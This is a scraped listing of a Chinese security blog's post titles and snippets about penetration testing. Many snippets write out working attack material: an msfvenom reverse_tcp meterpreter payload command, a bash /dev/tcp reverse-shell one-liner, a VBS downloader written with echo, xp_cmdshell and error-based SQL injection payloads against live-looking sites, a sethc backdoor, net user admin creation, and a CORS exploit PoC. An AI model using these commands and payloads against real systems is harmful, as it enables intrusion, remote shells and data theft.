安全
文章平均质量分 62
niexinming
不积跬步无以至千里
展开
-
实战中使用 QEMU 进行内网穿透
阅读https://xz.aliyun.com/t/14052 《使用 QEMU 进行内网穿透?我将此项技术应用到实战中,取得不错的效果,但是也遇到很多坑,此篇文章也是一篇排坑的文章。原创 2024-05-11 13:17:25 · 6026 阅读 · 3 评论 -
xxl-job 2.2之后版本高版本executor未授权访问漏洞
xxl-job executor 高版本未授权访问漏洞利用原创 2023-09-28 11:05:01 · 10843 阅读 · 0 评论 -
使用ysoserial生成反序列化文件
感谢清水大佬的帮助,这个代码是他的import java.io.FileInputStream;import java.io.FileOutputStream;import java.io.ObjectInputStream;import java.io.ObjectOutputStream;import ysoserial.payloads.CommonsBeanutils1;public class Test { public Test() { } public原创 2020-06-01 12:38:45 · 31609 阅读 · 2 评论 -
jar重新打包
首先原创 2020-05-05 00:00:37 · 30275 阅读 · 0 评论 -
msf成功的东西
成功生成反弹型payload msfvenom -a x86 --platform win -p windows/meterpreter/reverse_tcp LHOST=192.168.1.109 LPORT=5566 -f exe x> /home/niexinming/back.exe msfvenom -a x86 --platform win -p wi原创 2016-01-31 22:18:48 · 1057 阅读 · 1 评论 -
centos7(x64)安装snort
首先安装:sudoyum install libdnet然后安装:http://download.csdn.net/detail/niexinming/9602755下载后安装:sudo rpm -ivh daq-2.0.6-1.centos7.x86_64.rpm如果不安装上面这个就会报错:缺少libsfbpf.so.0然后再安装snort下载连接:http://原创 2016-08-14 01:19:53 · 3851 阅读 · 0 评论 -
ImageMagick 漏洞复现之路
我的环境是centos7 ,php是PHP 5.4.16,ImageMagick是6.7.8-9正好在影响范围之内,但是官方还是对其官网上所有的安装包进行了修复,所以现在下载下来的任何版本的ImageMagick都是不存在漏洞的,我们看看官方都是怎么修复的,并且还原漏洞现场漏洞原理在:https://jiji262.github.io/wooyun_articles/drops/CVE-2原创 2016-08-31 15:05:53 · 3816 阅读 · 0 评论 -
Linux 加固(centos7)
(1)寻找空密码的用户:首先root账户建立一个用户: useradd user (这样建立的用户的是不能直接用空密码登陆的)然后root账户用passwd -d user 清除user的密码(这样就可以用空密码登陆了)查找空密码的用户 awk -F: '($2==””){print $1}' /etc/shadow这样我们找到这样的空密码的用户:user给空密码账户上密码:原创 2016-08-20 16:19:47 · 13047 阅读 · 0 评论 -
不错的漏洞
http://www.secpulse.com/archives/3537.html原创 2015-11-28 18:08:35 · 1008 阅读 · 0 评论 -
各种一句话(持续更新)
转自冷风大神的文章:http://blog.csdn.net/chinafe/article/details/46860051echo set a=createobject(^"adod^"+^"b.stream^"):set w=createobject(^"micro^"+^"soft.xmlhttp^"):w.open ^"get^",wsh.arguments(0),0:w.send:原创 2016-09-09 20:57:03 · 978 阅读 · 0 评论 -
BurpSuite1.7/1.6拦截https
看了http://blog.csdn.net/zyw_anquan/article/details/47904495的文章,并且照着步骤一步一步做了之后还是不能拦截到https流量后来偶然打开http://burp的时候我发现要下载一个插件,我试着下载那个插件,安装之后,便可以拦截到https了下面是详细步骤:首先打开BurpSuite,然后设置浏览器代理:然后浏览器打原创 2016-10-12 10:47:48 · 4329 阅读 · 0 评论 -
bash反弹shell
bash -i >& /dev/tcp/自己的ip/自己的端口 0>&1原创 2015-12-31 20:17:10 · 10068 阅读 · 0 评论 -
读《利用环境变量LD_PRELOAD来绕过php disable_function执行系统命令》有感
今天看来一篇文章:http://cb.drops.wiki/wooyun/drops/tips-16054.html复现了一下,感觉有点坑我把复现的过程,结果和遇到问题在这里总结一下我的实验环境是centos7 php 5.4首先按照要求编译一个so1.创建一个hehe.c#include #include #include void payload()原创 2016-11-01 17:11:16 · 3154 阅读 · 2 评论 -
win10+vs2015缓冲区溢出实验
首先参考: http://blog.csdn.net/jiangwei0512/article/details/50856834 搭建vs2015的汇编环境然后关闭aslr (附上一个aslr 的介绍:http://blog.csdn.net/better0332/article/details/5262990)首先右键项目-》属性-》配置属性-》链接器-》高级把随机基址选否,固定基址原创 2016-12-01 17:15:02 · 4923 阅读 · 1 评论 -
无文件渗透实验
无文件渗透实验—这是60字节webshell的杂技前几天看了一个文章《全球上百家银行和金融机构感染了一种“无文件”恶意程序,几乎无法检测》 觉得powershell很是神奇,自己希望亲手实验一下,以最大程度还原“无文件”攻击方式拓扑设计 拓扑介绍:其中192.168.1.0/24模拟的是公网的环境172.21.132.0/24模拟的是企业内网的环境边界web服务器双网卡(公网的:192.1原创 2017-03-09 15:52:06 · 4379 阅读 · 0 评论 -
无弹窗渗透实验
首先是内网的拓扑 拓扑说明: 【1】10.101.101.0/24的网段模拟的是外网的地址 【2】192.168.101.0/24的网段模拟的是一个小型企业的内网中的应用服务器网络 【3】192.168.111.0/24的网段模拟的是一个小型企业的内网中的办公网络 【4】企业内网可以无限制的访问到外网,但是外网无法访问到企业内网 【5】办公网可以无限制的访问到应用服务器网络,但是应用原创 2017-09-02 23:51:09 · 5091 阅读 · 1 评论 -
一个postgresql延时注入的tips
postgresql支持堆叠查询,所以可以加入分号之后执行下一条语句,所以在注入的时候可以用 select * from a where b='注入点';;select pg_sleep(10);-- 这样会有10秒的延迟,可以利用这点去盲注PostgreSQL...原创 2018-03-20 11:26:38 · 3311 阅读 · 0 评论 -
跨域资源共享(CORS)漏洞详解-大咖聂心明-漏洞银行大咖面对面第84期
poc:<!DOCTYPE html><html><body><center><h2>CORS POC Exploit</h2><h3>Extract SID</h3> <div id="demo"><bu原创 2018-12-01 15:35:55 · 5985 阅读 · 0 评论 -
sql server 注入漏洞执行cmd指令并得到回显
';create table temp(id int identity(1,1),a varchar(8000));-- 创建一个表';insert into temp exec master.dbo.xp_cmdshell 'dir c:\'; -- 执行cmd指令并且插入到表中' and (select top 1 a from temp whe原创 2015-12-07 14:26:37 · 4280 阅读 · 0 评论 -
echo写vbs下载者木马
1.文件下载(无回显) echo iLocal = LCase(WScript.Arguments(1)) >c://iget.vbsecho iRemote = LCase(WScript.Arguments(0)) >>c://iget.vbsecho Set xPost = CreateObject("Microsoft.XMLHTTP") >>c://iget.vbsec转载 2016-04-17 16:22:06 · 2096 阅读 · 0 评论 -
mysql宽字符注入
先补充一点背景:大 家都知道PHP在开启magic_quotes_gpc或者使用addslashes、iconv等函数的时候,单引号(')会被转义成\'。比如字 符%bf在满足上述条件的情况下会变成%bf\'。其中反斜杠(\)的十六进制编码是%5C,单引号(')的十六进制编码是%27,那么就可以得出%bf \'=%bf%5c%27。如果程序的默认字符集是GBK等宽字节字符集,则MySQL会认为原创 2015-10-14 00:27:19 · 2467 阅读 · 0 评论 -
cmd添加管理员
“开始-运行”输入cmd首先创建一个用户net user 用户名 密码 /add比如你想创建一个用户名为:123密码为:456 net user 123 456 /add 当然也可以不设置密码,不设置密码只要不打上密码就可以了,如:net user 123 /add然后就加入管理员组了:net localgroup administrators 用户名 /add转载 2015-09-15 16:08:03 · 3021 阅读 · 0 评论 -
access偏移注入及mssql,mysql注入技巧
一:例子是:【1】http://218.245.4.113:8888/web03/ca55022fa7ae5c29d179041883fe1556/index.asp?id=886首先猜表名:http://218.245.4.113:8888/web03/ca55022fa7ae5c29d179041883fe1556/index.asp?id=886 and exists(selec原创 2015-11-05 16:53:13 · 1995 阅读 · 0 评论 -
mysql注入漏洞手注
mysql:报错注入:以http://www.hexie.com/main/articleDetail.php?id=757为例子:http://www.hexie.com/main/articleDetail.php?id=757'报错方法一:(1)http://www.hexie.com/main/articleDetail.php?id=757' and (sel原创 2015-09-29 19:28:28 · 6152 阅读 · 0 评论 -
oracle手注
报错注入:【1】爆版本号方法一:例子:http://210.35.35.70:82/Book.aspx?id=0199332841爆版本号:http://210.35.35.70:82/Book.aspx?id=0199332841' || utl_inaddr.get_host_name((select banner from v$version where rownum=1))原创 2015-10-09 01:12:06 · 2411 阅读 · 0 评论 -
利用ssrf 掩盖自己的ip地址,从而攻击其他网站
如果直接访问 http://www.ip.cn/ 就可以知道自己的ip地址,这样直接攻击网站就会暴露自己,但是,如果用ssrf这个漏洞,就可以用远程的服务器做代理去攻击其他网站例子:如果你这样访问http://qjjz.net/newsweb/news.shtml?url=http://www.ip.cn查看源代码,你会发现你的ip变成了,当前 IP:124.40.116.2原创 2015-10-29 14:09:31 · 1692 阅读 · 0 评论 -
简单的方式挖掘和利用soap的sql注入
1.首先soap是什么:对于应用程序开发来说,使程序之间进行因特网通信是很重要的。目前的应用程序通过使用远程过程调用(RPC)在诸如 DCOM 与 CORBA 等对象之间进行通信,但是 HTTP 不是为此设计的。RPC 会产生兼容性以及安全问题;防火墙和代理服务器通常会阻止此类流量。通过 HTTP 在应用程序间通信是更好的方法,因为 HTTP 得到了所有的因特网浏览器及服务器的支持。SOAP原创 2015-10-29 15:03:27 · 15421 阅读 · 3 评论 -
破解md5的python代码,持续更新
# -*- coding: utf-8 -*-import stringimport hashlibfile=open("hello.txt","a")md5input=raw_input("请输入md5:\n")md5input=md5input.lower()apt=string.printable[:-6]def dfs(s,num): m=hashlib.md5()原创 2015-09-22 00:50:44 · 16925 阅读 · 3 评论 -
dns带外查询(cloudeye.me的使用)
一些操蛋盲注可以用dns的带外查询来解决了,而且有了cloudeye这个神器就可以愉快的解决:说明:我们在浏览网页或者ping某个域名的时候我们先是从域名服务器里面获取那个网站的ip地址,然后我们才会发起对那台服务的请求,cloudeye留下了四级五级域名的控制权,所以我们能发起一个域名请求来在cloudeye留下日志信息,从将数据库的信息带出来比如:ping test.xxx原创 2015-11-23 21:34:55 · 10856 阅读 · 0 评论 -
端口转发
Windows:1、htran正向代理服务端 htran.exe -s -bind 8888客户端 SocksCap:SOCKS Version 5 服务端IP:8888反向代理客户端 htran.exe -s -listen 1234 8888服务端 htran.exe -s -connect 客户端IP 1234客户端 SocksCap:SOCKS转载 2016-02-07 02:01:46 · 1401 阅读 · 0 评论 -
创建Metasploit Payloads
Often one of the most useful (and to the beginner underrated) abilities of Metasploit is the msfpayload module. Multiple payloads can be created with this module and it helps something that can give y转载 2016-01-31 11:27:03 · 1407 阅读 · 0 评论 -
sethc后门
一般清除电脑密码办法就是利用PE等工具,如果没有任何工具的情况下该怎么办?现在说一个办法,不借助任何工具,实现添加系统用户或者修改密码等操作。开机后按F8,选择正常启动Windows,然后强制关机或者断电。接着在继续启动电脑,会提示让你修复,选择启动修复(推荐)。启动修复一两分钟后,会弹出一个对话框,然后点击箭头查看详细信息。点击txt文本链接,然后点击文件->打开转载 2016-02-14 21:55:14 · 2506 阅读 · 0 评论 -
xss学习的一小步
学习地址:http://xss.pkav.net/xss/【一】绕过浏览器过滤的语句,http://wooyun.org/bugs/wooyun-2010-016672【2】利用html编码绕过百度云加速:http://www.changwei.me/2015/index.php?q="/>【3】检测xss 用\http://wooyun.o原创 2016-03-18 17:44:10 · 1195 阅读 · 1 评论 -
mssql差异备份拿shell
(1)首先:declare @a sysname,@s varchar(4000) select @a=db_name(),@s=0x4e6577706f7274 backup database @a to disk=@s;注意:0x4e6577706f7274 这个字符串是数据库名字的十六进制数字,这个这个字符串的转换用hackbar这个小工具进行转换这里的数据库名字是:Newpor原创 2016-03-08 20:12:12 · 5354 阅读 · 0 评论 -
mssql手工注入
报错注入:例子:www.kfgtfcj.gov.cn/lzygg/Zixun_show.aspx?id=1【1】首先爆版本:http://www.kfgtfcj.gov.cn/lzygg/Zixun_show.aspx?id=1 and @@version>0报错信息:在将 nvarchar 值 'Microsoft SQL Server 2008 R2 (RTM) - 10.50.1原创 2015-10-11 22:52:49 · 14887 阅读 · 3 评论 -
开发一个安全的小网站(二)防止sql注入
首先直接靠拼接字符串来做数据库的查询是很危险的错误的写法比如:原创 2015-09-02 21:58:59 · 714 阅读 · 1 评论 -
开发一个安全的小网站(三)加密关键数据
好多网站的数据都是md5值加密,这样通过网站cmd5就可以简单获取原密码,很不安全,而且有很多人嫌麻烦会去用一些简单的密码,这样如果黑客获取到了数据库,那么这将是灾难性的,那么如何简单的有效的加密关键数据呢?先给张图,看看,简单密码占多大比例吧 简单密码所占数量放个加密方式,主要是des+md5的加密(这是c# 代码 要用到using System.Security.Cry原创 2015-09-02 23:22:22 · 782 阅读 · 0 评论 -
开发一个安全的小网站(一)安全要素
1. 网站建设的通信协议安全:(1)要用到ssl来保障通信传输不被窃听(1)ssl要用最新的版本,避免心脏滴血漏洞的影响(3)证书要加密传输2. 服务器建设安全:【1】如果选用windows:(1)最好用windows2008 r2版本(2)网站的权限要适当降低,不要用管理员权限搭建网站(3)网站上传文件后,存放文件的地方要禁止脚本的执行,上传要严格检查上传的后缀名(可原创 2015-09-02 21:41:15 · 1293 阅读 · 0 评论